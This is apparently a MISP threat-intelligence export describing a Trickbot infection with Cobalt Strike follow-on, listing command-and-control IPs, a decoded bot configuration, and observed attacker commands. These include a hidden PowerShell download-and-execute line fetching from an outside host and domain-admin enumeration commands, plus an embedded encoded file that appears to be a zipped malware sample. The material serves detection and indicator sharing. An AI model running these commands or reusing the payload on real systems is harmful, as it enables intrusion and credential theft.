{
"Event": {
"analysis": "0",
"date": "2020-03-17",
"extends_uuid": "",
"info": "Trickbot Gtag lib693/tt0002",
"publish_timestamp": "1593748782",
"published": true,
"threat_level_id": "3",
"timestamp": "1621850733",
"uuid": "5e70a28a-d97c-47f6-a229-40990a0a020f",
"Orgc": {
"name": "laskowski-tech.com",
"uuid": "5e157d76-c92c-4acd-a54e-4a01950d210f"
},
"Tag": [
{
"colour": "#0ab4a7",
"local": "0",
"name": "Cobalt Strike",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
},
{
"colour": "#0088cc",
"local": "0",
"name": "misp-galaxy:malpedia=\"TrickBot\"",
"relationship_type": ""
},
{
"colour": "#ffffff",
"local": "0",
"name": "tlp:white",
"relationship_type": ""
}
],
"Attribute": [
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440871",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f0-6724-42d1-98b0-446f74656a8a",
"value": "5.182.210.226|443",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-aab8-402e-b421-4bd074656a8a",
"value": "192.210.226.106|443",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-c5d8-4878-819f-42e974656a8a",
"value": "51.254.164.244|443",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-6fb8-49f1-857e-48e574656a8a",
"value": "45.148.120.153|443",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-c5c0-4f9c-a390-44d174656a8a",
"value": "195.123.239.67|443",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-f7e4-4282-8d69-47a274656a8a",
"value": "194.5.250.150|443",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-6578-48eb-84a0-45c174656a8a",
"value": "217.12.209.200|443",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-d5ac-4066-845e-4bec74656a8a",
"value": "185.99.2.221|443",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-a65c-4298-ab55-47e974656a8a",
"value": "51.254.164.245|443",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-4374-4583-a321-4c2774656a8a",
"value": "185.62.188.159|443",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-f674-43e8-8460-4a2474656a8a",
"value": "46.17.107.65|443",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-10a0-4465-b424-4a3074656a8a",
"value": "185.20.185.76|443",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-4550-4d05-91e0-497974656a8a",
"value": "185.203.118.37|443",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-0f94-4075-9550-4a7074656a8a",
"value": "146.185.253.178|443",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-52b8-4639-8568-4ad274656a8a",
"value": "185.14.31.252|443",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-8da8-47cf-ada7-4d7274656a8a",
"value": "185.99.2.115|443",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-6490-4fde-b15b-4fe274656a8a",
"value": "172.245.156.138|443",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440871",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-e478-43e0-8336-4fe074656a8a",
"value": "51.89.73.158|443",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-020c-4fbf-b4a0-488a74656a8a",
"value": "190.214.13.2|449",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-f38c-4dd9-a3f9-4b3374656a8a",
"value": "181.140.173.186|449",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-860c-47fb-8aa8-4d6574656a8a",
"value": "181.129.104.139|449",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-2780-4a1d-87ac-480874656a8a",
"value": "181.113.28.146|449",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-b0fc-481b-86f6-4de574656a8a",
"value": "181.112.157.42|449",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-7d68-425d-82d6-45a674656a8a",
"value": "170.84.78.224|449",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-059c-4637-b10d-4cdf74656a8a",
"value": "200.21.51.38|449",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-c28c-46bf-b7fb-493874656a8a",
"value": "46.174.235.36|449",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-fd44-4949-80c1-434174656a8a",
"value": "36.89.85.103|449",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-a5e4-4e3e-bb6f-457d74656a8a",
"value": "181.129.134.18|449",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-15fc-44b3-bd10-4a6a74656a8a",
"value": "186.71.150.23|449",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-91b0-4aa1-920b-4b2974656a8a",
"value": "131.161.253.190|449",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-498c-40f6-8ef1-46e874656a8a",
"value": "200.127.121.99|449",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-f290-41ad-9ab3-461674656a8a",
"value": "114.8.133.71|449",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-c434-4f05-9cc8-4f5574656a8a",
"value": "119.252.165.75|449",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-b7d4-48c7-9f26-49e274656a8a",
"value": "121.100.19.18|449",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-e7e4-4dba-b99d-4eb374656a8a",
"value": "202.29.215.114|449",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-549c-470e-a6de-465f74656a8a",
"value": "180.180.216.177|449",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-1278-4b1b-8bb6-40f874656a8a",
"value": "171.100.142.238|449",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-c438-4004-88c9-495a74656a8a",
"value": "186.232.91.240|449",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-9a68-4b61-b682-4f4674656a8a",
"value": "181.196.207.202|449",
"Tag": [
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
},
{
"colour": "#991515",
"local": "0",
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440983",
"to_ids": true,
"type": "ip-dst",
"uuid": "5e70a685-4150-4cad-be79-4eb70a0a020f",
"value": "66.42.99.79",
"Tag": [
{
"colour": "#0ab4a7",
"local": "0",
"name": "Cobalt Strike",
"relationship_type": ""
},
{
"colour": "#e200a3",
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
}
]
},
{
"category": "Support Tool",
"comment": "decoded trickbot config using https://github.com/hasherezade/malware_analysis/tree/master/trickbot",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584441141",
"to_ids": false,
"type": "text",
"uuid": "5e70a70a-34cc-4e93-9307-46120a0a020f",
"value": "./trick_settings_decoder.py --brute --file ~/Downloads/settings.ini\r\nSearching the charset...\r\n\r\n[+] Decoded with matching charset: HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o1246jMQDz7ETy\r\n\r\n<mcconf>\r\n<ver>1000503</ver>\r\n<gtag>tt0002</gtag>\r\n<servs>\r\n<srv>5.182.210.226:443</srv>\r\n<srv>192.210.226.106:443</srv>\r\n<srv>51.254.164.244:443</srv>\r\n<srv>45.148.120.153:443</srv>\r\n<srv>195.123.239.67:443</srv>\r\n<srv>194.5.250.150:443</srv>\r\n<srv>217.12.209.200:443</srv>\r\n<srv>185.99.2.221:443</srv>\r\n<srv>51.254.164.245:443</srv>\r\n<srv>185.62.188.159:443</srv>\r\n<srv>46.17.107.65:443</srv>\r\n<srv>185.20.185.76:443</srv>\r\n<srv>185.203.118.37:443</srv>\r\n<srv>146.185.253.178:443</srv>\r\n<srv>185.14.31.252:443</srv>\r\n<srv>185.99.2.115:443</srv>\r\n<srv>172.245.156.138:443</srv>\r\n<srv>51.89.73.158:443</srv>\r\n<srv>190.214.13.2:449</srv>\r\n<srv>181.140.173.186:449</srv>\r\n<srv>181.129.104.139:449</srv>\r\n<srv>181.113.28.146:449</srv>\r\n<srv>181.112.157.42:449</srv>\r\n<srv>170.84.78.224:449</srv>\r\n<srv>200.21.51.38:449</srv>\r\n<srv>46.174.235.36:449</srv>\r\n<srv>36.89.85.103:449</srv>\r\n<srv>181.129.134.18:449</srv>\r\n<srv>186.71.150.23:449</srv>\r\n<srv>131.161.253.190:449</srv>\r\n<srv>200.127.121.99:449</srv>\r\n<srv>114.8.133.71:449</srv>\r\n<srv>119.252.165.75:449</srv>\r\n<srv>121.100.19.18:449</srv>\r\n<srv>202.29.215.114:449</srv>\r\n<srv>180.180.216.177:449</srv>\r\n<srv>171.100.142.238:449</srv>\r\n<srv>186.232.91.240:449</srv>\r\n<srv>181.196.207.202:449</srv>\r\n</servs>\r\n<autorun>\r\n<module name=\"pwgrab\"/>\r\n</autorun>\r\n</mcconf>"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584441521",
"to_ids": true,
"type": "url",
"uuid": "5e70a89e-79d0-4f1c-a597-4cf50a0a020f",
"value": "http://66.42.99.79:80/q",
"Tag": [
{
"colour": "#0ab4a7",
"local": "0",
"name": "Cobalt Strike",
"relationship_type": ""
},
{
"colour": "#8a0064",
"local": "0",
"name": "kill-chain:Delivery",
"relationship_type": ""
}
]
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584441608",
"to_ids": false,
"type": "text",
"uuid": "5e70a908-11b4-4fcd-a31c-4b380a0a020f",
"value": "%WINDIR%\\system32\\cmd.exe /C net group \"enterprise admins\" /domain"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584441628",
"to_ids": false,
"type": "text",
"uuid": "5e70a91c-ba40-44f8-a6a4-4b360a0a020f",
"value": "%WINDIR%\\system32\\cmd.exe /C net group \"domain admins\" /domain"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584441700",
"to_ids": false,
"type": "text",
"uuid": "5e70a964-6484-4ac5-a73b-40b40a0a020f",
"value": "%WINDIR%\\system32\\net1 config workstation"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584441756",
"to_ids": false,
"type": "text",
"uuid": "5e70a99c-07a4-4eae-8027-421b0a0a020f",
"value": "%WINDIR%\\System32\\cmd.exe /c nltest /domain_trusts"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584441800",
"to_ids": false,
"type": "text",
"uuid": "5e70a9c8-27d8-4d27-a2c6-43b00a0a020f",
"value": "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://66.42.99.79:80/q'))\""
},
{
"category": "External analysis",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584443507",
"to_ids": false,
"type": "link",
"uuid": "5e70b073-671c-4c61-97c4-4ab90a0a020f",
"value": "https://laskowski-tech.com/2020/03/16/breakout-time-trickbot-edition/"
}
],
"Object": [
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "17",
"timestamp": "1584440909",
"uuid": "5e70a31f-5d70-41f2-9914-45110a0a020f",
"Attribute": [
{
"category": "Artifacts dropped",
"comment": "",
"data": "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